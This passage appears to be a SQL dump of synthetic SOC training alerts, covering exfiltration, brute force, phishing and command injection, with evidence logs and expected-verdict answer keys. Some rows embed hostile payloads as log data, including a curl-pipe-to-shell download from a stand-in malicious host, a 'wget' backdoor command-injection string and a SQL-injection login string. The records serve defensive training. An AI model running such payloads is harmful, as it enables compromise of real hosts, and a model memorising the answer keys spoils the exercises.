'{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1300, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention (DLP) Systems', 'An unauthorized attempt to exfiltrate sensitive documents and communications was detected. The attackers leveraged encrypted channels to avoid detection. The attempt involved the transfer of files to an external server.', 'Data Theft', 'T1048: Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"DLP-2023-9876\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"filename\":\"confidential_report.docx\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"protocol\":\"HTTPS\",\"action\":\"Blocked\",\"description\":\"Sensitive file transfer attempt to external IP using encrypted channel.\"}', '2026-02-24 03:16:14', '2026-02-24 15:34:41', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the host attempting exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint_service\",\"verdict\":\"malicious\",\"details\":\"External IP address associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_report.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"dlp_system\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document flagged for unauthorized transfer attempt.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_lookup_service\",\"verdict\":\"clean\",\"details\":\"File hash matches known clean file but flagged due to context.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-2023-9876\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_report.docx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Blocked\\\",\\\"description\\\":\\\"Sensitive file transfer attempt to external IP using encrypted channel.\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-2023-9876\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_report.docx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Blocked\\\",\\\"description\\\":\\\"Sensitive file transfer attempt to external IP using encrypted channel.\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-2023-9876\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_report.docx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Blocked\\\",\\\"description\\\":\\\"Sensitive file transfer attempt to external IP using encrypted channel.\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-2023-9876\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_report.docx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Blocked\\\",\\\"description\\\":\\\"Sensitive file transfer attempt to external IP using encrypted channel.\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-2023-9876\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_report.docx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Blocked\\\",\\\"description\\\":\\\"Sensitive file transfer attempt to external IP using encrypted channel.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1301, 'Connection to Russian Services Analyzed', 'high', 'Threat Intelligence Reports', 'The analysis identified the use of known Gamaredon TTPs and infrastructure, indicative of potential connections to Russian security services. Specific indicators include IP addresses, file hashes, and domains linked to malicious activity.', 'Attribution Analysis', 'TTPs and Infrastructure Analysis', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-16T14:23:45Z\",\"source_ip\":\"185.165.123.45\",\"destination_ip\":\"10.0.5.23\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"domain\":\"malicious-russian-service.ru\",\"username\":\"compromised_user\",\"filename\":\"gamaredon_payload.exe\",\"action\":\"detected\",\"outcome\":\"success\"}', '2026-02-24 03:16:14', '2026-02-24 15:35:35', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.165.123.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Gamaredon APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Gamaredon malware samples.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"malicious-russian-service.ru\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Domain used in previous Gamaredon attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"gamaredon_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"APT Artifact Database\",\"verdict\":\"malicious\",\"details\":\"Filename pattern commonly used by Gamaredon group.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User account suspected of being compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.764Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-16T14:23:45Z\\\",\\\"source_ip\\\":\\\"185.165.123.45\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"domain\\\":\\\"malicious-russian-service.ru\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"gamaredon_payload.exe\\\",\\\"action\\\":\\\"detected\\\",\\\"outcome\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.764Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-16T14:23:45Z\\\",\\\"source_ip\\\":\\\"185.165.123.45\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"domain\\\":\\\"malicious-russian-service.ru\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"gamaredon_payload.exe\\\",\\\"action\\\":\\\"detected\\\",\\\"outcome\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.764Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-16T14:23:45Z\\\",\\\"source_ip\\\":\\\"185.165.123.45\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"domain\\\":\\\"malicious-russian-service.ru\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"gamaredon_payload.exe\\\",\\\"action\\\":\\\"detected\\\",\\\"outcome\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.764Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-16T14:23:45Z\\\",\\\"source_ip\\\":\\\"185.165.123.45\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"domain\\\":\\\"malicious-russian-service.ru\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"gamaredon_payload.exe\\\",\\\"action\\\":\\\"detected\\\",\\\"outcome\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.764Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-16T14:23:45Z\\\",\\\"source_ip\\\":\\\"185.165.123.45\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"domain\\\":\\\"malicious-russian-service.ru\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"gamaredon_payload.exe\\\",\\\"action\\\":\\\"detected\\\",\\\"outcome\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1302, 'Unauthorized Access Attempt to S3 Bucket', 'high', 'AWS GuardDuty', 'Multiple failed login attempts detected on S3 bucket with credentials from an unusual IP address.', 'Credential Attack', 'T1110', 1, 'resolved', NULL, '{\"timestamp\":\"2026-02-24T03:15:32Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.5\",\"username\":\"john.doe\",\"hostname\":\"s3-bucket-server\",\"request_body\":null,\"command_line\":null}', '2026-02-24 03:24:16', '2026-02-27 06:50:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Common internal username\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The repeated failed login attempts from a malicious IP indicate a likely credential brute force attack.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.765Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T03:15:32Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"s3-bucket-server\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.765Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T03:15:32Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"s3-bucket-server\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.765Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T03:15:32Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"s3-bucket-server\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.765Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T03:15:32Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"s3-bucket-server\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.765Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T03:15:32Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"s3-bucket-server\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1303, 'Suspicious Process Execution on Kubernetes Node', 'critical', 'Prisma Cloud', 'A suspicious command was executed on a Kubernetes node, potentially indicating exploitation of vulnerabilities.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-02-24T06:45:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.8\",\"username\":\"kube-admin\",\"hostname\":\"k8s-node-02\",\"request_body\":null,\"command_line\":\"curl -fsSL http://malicious-site.com/install.sh | sh\"}', '2026-02-24 03:24:16', '2026-02-27 06:49:49', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP linked to known malware distribution site\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"curl -fsSL http://malicious-site.com/install.sh | sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command associated with downloading and executing malware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of curl to download and execute a script from a known malicious site is indicative of a malware infection attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.766Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T06:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"kube-admin\\\",\\\"hostname\\\":\\\"k8s-node-02\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"curl -fsSL http://malicious-site.com/install.sh | sh\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.766Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T06:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"kube-admin\\\",\\\"hostname\\\":\\\"k8s-node-02\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"curl -fsSL http://malicious-site.com/install.sh | sh\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.766Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T06:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"kube-admin\\\",\\\"hostname\\\":\\\"k8s-node-02\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"curl -fsSL http://malicious-site.com/install.sh | sh\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.766Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T06:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"kube-admin\\\",\\\"hostname\\\":\\\"k8s-node-02\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"curl -fsSL http://malicious-site.com/install.sh | sh\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.766Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T06:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"kube-admin\\\",\\\"hostname\\\":\\\"k8s-node-02\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"curl -fsSL http://malicious-site.com/install.sh | sh\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1304, 'Phishing Email Containing Malicious URL', 'medium', 'Proofpoint', 'An email was received from a spoofed domain containing a URL leading to a phishing site.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-02-24T01:22:47Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.0.2.25\",\"dst_ip\":null,\"username\":\"alice@example.com\",\"hostname\":null,\"request_body\":null,\"command_line\":null,\"email_sender\":\"noreply@secure-login.com\",\"url\":\"http://phishing-site.com/login\"}', '2026-02-24 03:24:16', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"noreply@secure-login.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Domain appears similar to legitimate site\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://phishing-site.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing campaigns\"}}],\"expected_actions\":[\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The presence of a known phishing URL in an email from a spoofed domain confirms this as a phishing attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Containing Malicious URL\",\"date\":\"2026-02-24T04:22:04.767Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1305, 'Detected Command Injection on Public Web Server', 'critical', 'Wiz', 'A command injection attempt was detected on a public-facing web server, potentially compromising the server\'s integrity.', 'Web Attack', 'T1190', 1, 'investigating', 109, '{\"timestamp\":\"2026-02-24T04:12:55Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.56\",\"dst_ip\":\"192.168.2.5\",\"username\":null,\"hostname\":\"web-server-01\",\"request_body\":\"id; wget http://malicious-site.com/backdoor.sh\",\"command_line\":null}', '2026-02-24 03:24:16', '2026-02-26 14:03:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for multiple web application attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"id; wget http://malicious-site.com/backdoor.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command injection attempt to download and execute a backdoor\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The presence of a command injection payload targeting a known vulnerable endpoint confirms malicious intent.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.768Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T04:12:55Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.56\\\",\\\"dst_ip\\\":\\\"192.168.2.5\\\",\\\"username\\\":null,\\\"hostname\\\":\\\"web-server-01\\\",\\\"request_body\\\":\\\"id; wget http://malicious-site.com/backdoor.sh\\\",\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.768Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T04:12:55Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.56\\\",\\\"dst_ip\\\":\\\"192.168.2.5\\\",\\\"username\\\":null,\\\"hostname\\\":\\\"web-server-01\\\",\\\"request_body\\\":\\\"id; wget http://malicious-site.com/backdoor.sh\\\",\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.768Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T04:12:55Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.56\\\",\\\"dst_ip\\\":\\\"192.168.2.5\\\",\\\"username\\\":null,\\\"hostname\\\":\\\"web-server-01\\\",\\\"request_body\\\":\\\"id; wget http://malicious-site.com/backdoor.sh\\\",\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.768Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T04:12:55Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.56\\\",\\\"dst_ip\\\":\\\"192.168.2.5\\\",\\\"username\\\":null,\\\"hostname\\\":\\\"web-server-01\\\",\\\"request_body\\\":\\\"id; wget http://malicious-site.com/backdoor.sh\\\",\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.768Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 